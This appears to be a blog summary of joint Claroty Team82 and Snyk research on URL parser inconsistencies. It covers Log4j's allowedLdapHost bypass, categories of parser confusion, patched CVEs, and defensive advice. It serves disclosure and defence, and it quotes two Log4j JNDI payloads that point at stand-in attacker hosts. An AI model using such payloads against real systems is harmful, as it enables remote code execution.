URLs are in many ways the hub of our digital lives, our link to critical services, news, entertainment, and much more. Therefore, any security vulnerabilities in how browsers, applications, and servers receive URL requests, parse them, and fetch requested resources could pose significant issues for users and harm trust in the internet.

Claroty’s Team82, in collaboration with Snyk’s research team, has conducted an extensive research project examining URL parsing primitives, and discovered major differences in the way many different parsing libraries and tools handle URLs.

They have released the paper, Exploiting URL Parsers: The Good, Bad, and Inconsistent, which describes their analysis, showcases the differences between parsers, and explains how URL parsing confusion may be abused. It also uncovers eight vulnerabilities that have been privately disclosed and patched.

Understanding URL Syntax

To understand how differences in URL parsing primitives could be abused, we first need a basic understanding of how URLs are built.

URLs are built from five different components: scheme, authority, path, query and a fragment. Each component fulfills a different role, be it dictating the protocol for the request, the host which holds the resource, which exact resource should be fetched, and more.


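As a rough illustration of these components, the sketch below splits a made-up URL with Python's `urllib.parse.urlsplit`, one of the parsers examined in the research. The URL itself is a hypothetical example chosen only to exercise all five parts.

```python
from urllib.parse import urlsplit

# Hypothetical URL, used only to show where each component ends up.
url = "https://user@example.com:8443/docs/index.html?lang=en#intro"
parts = urlsplit(url)

print(parts.scheme)    # https
print(parts.netloc)    # user@example.com:8443  (the authority)
print(parts.hostname)  # example.com
print(parts.port)      # 8443
print(parts.path)      # /docs/index.html
print(parts.query)     # lang=en
print(parts.fragment)  # intro
```

Note that the host is only one part of the authority, which may also carry user information and a port.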

Over the years, there have been many RFCs that defined URLs, each making changes in an attempt to enhance the URL standard. However, the frequency of changes created major differences in URL parsers, each of which complies with a different RFC (in order to be backward compatible). Some, in fact, choose to ignore new RFCs altogether, instead adopting a URL specification they deem more reflective of how real-life URLs should be parsed. This created an environment in which one URL parser could interpret a URL differently than another, which could lead to serious security concerns.

The history of URL-defining RFCs, starting with RFC 1738 which was written in 1994, and ending with the most up-to-date RFC, RFC 3986 which was written in 2005.

Recent Example: Log4j allowedLdapHost Bypass

In order to fully understand how dangerous confusion among URL parsing primitives can be, let’s take a look at a real-life vulnerability that abused those differences. In December 2021, the world was taken by storm by a remote code execution vulnerability in Log4j, a popular Java logging library.

Because of Log4j’s popularity, millions of servers and applications were affected, forcing administrators to determine where Log4j may be in their environments and their exposure to proof-of-concept attacks in the wild.

While we will not fully explain this vulnerability here—it was widely covered—the gist of the vulnerability originates in a malicious attacker-controlled string being evaluated whenever it is logged by an application, resulting in a JNDI (Java Naming and Directory Interface) lookup that connects to an attacker-specified server and loads malicious Java code.

A payload triggering this vulnerability could look like this: ${jndi:ldap://attacker.com:1389/a}

This payload would result in a remote class being loaded to the current Java context if this string were logged by a vulnerable application.

Team82 preauth RCE against VMware vCenter ESXi Server, exploiting the log4j vulnerability

Because of the popularity of this library, and the vast number of servers which this vulnerability affected, many patches and countermeasures were introduced in order to remedy this vulnerability. We will talk about one countermeasure in particular, which aimed to block any attempts to load classes from a remote source using JNDI.

This remedy was made inside the lookup process of the JNDI interface. Instead of allowing JNDI lookups from arbitrary remote sources, which could result in remote code execution, JNDI would allow only lookups from a set of predefined whitelisted hosts, allowedLdapHost, which by default contained only localhost. This would mean that even if an attacker-given input is evaluated and a JNDI lookup is made, the lookup process would fail if the given host is not in the whitelisted set. Therefore, an attacker-hosted class would not be loaded and the vulnerability rendered moot.

However, soon after this fix, a bypass to this mitigation was found (CVE-2021-45046), which once again allowed remote JNDI lookup and allowed the vulnerability to be exploited in order to achieve RCE. Let’s analyse the bypass, which is as follows:

${jndi:ldap://127.0.0.1#.evilhost.com:1389/a}

As we can see, this payload once again contains a URL. However, the Authority component (host) of the URL seems irregular, containing two different hosts: 127.0.0.1 and evilhost.com. As it turns out, this is exactly where the bypass lies. Two different (!) URL parsers were used inside the JNDI lookup process, one for validating the URL and another for fetching it. Depending on how each parser treats the Fragment portion (#) of the URL, the Authority changes too.

In order to validate that the URL’s host is allowed, Java’s URI class was used, which parsed the URL, extracted the host, and checked if the host is on the whitelist of allowed hosts. And indeed, if we parse this URL using Java’s URI, we find out that the URL’s host is 127.0.0.1, which is included in the whitelist.

However, on certain operating systems (mainly macOS) and specific configurations, when the JNDI lookup process fetches this URL, it does not try to fetch it from 127.0.0.1. Instead, it makes a request to 127.0.0.1#.evilhost.com. This means that while this malicious payload will bypass the allowedLdapHost localhost validation (which is done by the URI parser), it will still try to fetch a class from a remote location.

This bypass showcases how minor discrepancies between URL parsers could create huge security concerns and real-life vulnerabilities.
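The same kind of disagreement can be reproduced outside Java. The sketch below is not the code used by Log4j or JNDI. It assumes Python's `urllib.parse.urlsplit` as a stand-in for the validating parser, and a deliberately naive, hypothetical `naive_host` function as a stand-in for a fetcher that does not treat `#` as a delimiter. The allowlist is also an assumption made for illustration.

```python
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"localhost", "127.0.0.1"}  # assumed allowlist, for illustration

def validating_host(url: str) -> str:
    """Host as seen by urlsplit, where '#' ends the authority."""
    return urlsplit(url).hostname or ""

def naive_host(url: str) -> str:
    """Hypothetical fetcher-side parsing: only '/' and ':' end the host."""
    after_scheme = url.split("://", 1)[1]
    authority = after_scheme.split("/", 1)[0]
    return authority.rsplit(":", 1)[0]

url = "ldap://127.0.0.1#.evilhost.com:1389/a"

checked = validating_host(url)
fetched = naive_host(url)
print(checked)  # 127.0.0.1
print(fetched)  # 127.0.0.1#.evilhost.com
print(checked in ALLOWED_HOSTS, fetched in ALLOWED_HOSTS)  # True False
```

The check passes on one interpretation of the URL while the request is made using another, which is the essence of the bypass.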

Team82-Snyk Joint Research Outcomes

During this analysis, researchers looked into the following libraries and tools written in numerous languages: urllib (Python), urllib3 (Python), rfc3986 (Python), httptools (Python), curl lib (cURL), Wget, Chrome (Browser), Uri (.NET), URL (Java), URI (Java), parse_url (PHP), url (NodeJS), url-parse (NodeJS), net/url (Go), uri (Ruby) and URI (Perl).

As a result of this analysis, researchers were able to identify and categorise five different scenarios in which most URL parsers behaved unexpectedly:

- Scheme Confusion: A confusion involving URLs with missing or malformed scheme

- Slash Confusion: A confusion involving URLs containing an irregular number of slashes

- Backslash Confusion: A confusion involving URLs containing backslashes (\)

- URL-Encoded Data Confusion: A confusion involving URLs containing URL-encoded data

- Scheme Mixup: A confusion involving parsing a URL belonging to a certain scheme without a scheme-specific parser
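Several of these categories can be observed with a single parser. The sketch below feeds made-up URLs to Python's `urllib.parse.urlsplit` and prints what it extracts. The URLs and host names are hypothetical, and the comments about other parsers describe general behaviour rather than results reproduced here.

```python
from urllib.parse import urlsplit

# Scheme confusion: with no scheme, urlsplit finds no host at all and
# treats the whole string as a path.
no_scheme = urlsplit("www.example.com/path")
print(repr(no_scheme.netloc), no_scheme.path)      # '' www.example.com/path

# Slash confusion: a third slash leaves the authority empty, and the
# intended host ends up in the path.
extra_slash = urlsplit("https:///www.example.com/path")
print(repr(extra_slash.netloc), extra_slash.path)  # '' /www.example.com/path

# Backslash confusion: urlsplit keeps '\' inside the authority, so the
# text before '@' is read as user information.
backslash = urlsplit("https://evil.example\\@good.example/")
print(backslash.hostname)                          # good.example

# URL-encoded data confusion: urlsplit does not decode the host.
encoded = urlsplit("https://%65xample.com/")
print(encoded.hostname)                            # %65xample.com
```

A parser that follows the WHATWG URL specification, as browsers do, treats the backslash in the third example as a slash and would therefore see `evil.example` as the host. Any component that fetches the URL with such a parser after validating it with `urlsplit` would contact a different host than the one that was checked.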

By abusing those inconsistencies, many possible vulnerabilities could arise, ranging from a server-side request forgery (SSRF) vulnerability, which could result in remote code execution, all the way to an open-redirect vulnerability, which could result in a sophisticated phishing attack.

As a result of this research, researchers were able to identify the following vulnerabilities, which affect different frameworks and even different programming languages. The vulnerabilities below have been patched except for those found in unsupported versions of Flask:

- Flask-security (Python, CVE-2021-23385)

- Flask-security-too (Python, CVE-2021-32618)

- Flask-User (Python, CVE-2021-23401)

- Flask-unchained (Python, CVE-2021-23393)

- Belledonne’s SIP Stack (C, CVE-2021-33056)

- Video.js (JavaScript, CVE-2021-23414)

- Nagios XI (PHP, CVE-2021-37352)

- Clearance (Ruby, CVE-2021-23435)

Recommendations

Many real-life attack scenarios could arise from differences between parsing primitives. In order to sufficiently protect your application from vulnerabilities involving URL parsing, it is necessary to fully understand which parsers are involved in the whole process, whether programmatic parsers, external tools, or others.

Once each parser involved is known, a developer should fully understand the differences between them: their leniency, how they interpret different malformed URLs, and what types of URLs they support.

As always, user-supplied URLs should never be blindly trusted. Instead, they should first be canonicalized and then validated, with the differences between the parsers in use treated as an important part of the validation.
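One way to apply this advice is to parse the URL once, validate the parsed components, and then hand downstream code a URL rebuilt from those components rather than the original string. The sketch below is a minimal illustration in Python, not a complete defence. The function name `canonicalize_and_validate`, the allowlists, and the specific rejection rules are all assumptions made for this example.

```python
from urllib.parse import urlsplit, urlunsplit

ALLOWED_SCHEMES = {"https"}                          # assumed policy
ALLOWED_HOSTS = {"example.com", "www.example.com"}   # hypothetical allowlist

def canonicalize_and_validate(raw: str) -> str:
    """Return a rebuilt URL if it passes the checks, else raise ValueError."""
    # Reject characters that different parsers are known to treat differently.
    if "\\" in raw or any(ch.isspace() or ord(ch) < 0x20 for ch in raw):
        raise ValueError("backslash, whitespace or control character in URL")

    parts = urlsplit(raw)
    if parts.scheme not in ALLOWED_SCHEMES:
        raise ValueError("scheme not allowed")
    if parts.username is not None or parts.password is not None:
        raise ValueError("user information not allowed")
    host = parts.hostname or ""
    if host not in ALLOWED_HOSTS:
        raise ValueError("host not allowed")
    port = parts.port  # raises ValueError if the port is malformed

    netloc = host if port is None else f"{host}:{port}"
    # Rebuild from the validated components and drop the fragment, so the
    # fetcher receives exactly what was checked.
    return urlunsplit((parts.scheme, netloc, parts.path or "/", parts.query, ""))

print(canonicalize_and_validate("HTTPS://Example.com/a?b=1#frag"))
# https://example.com/a?b=1
print(canonicalize_and_validate("https://example.com#@evil.example/"))
# https://example.com/
```

Because the fetcher only ever sees the rebuilt string, a second parser has far less room to interpret it differently from the validator.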

You can read the full paper here to learn more about exploiting these parsing confusion scenarios, and a number of recommendations that blunt the impact of these vulnerabilities if they’re exploited.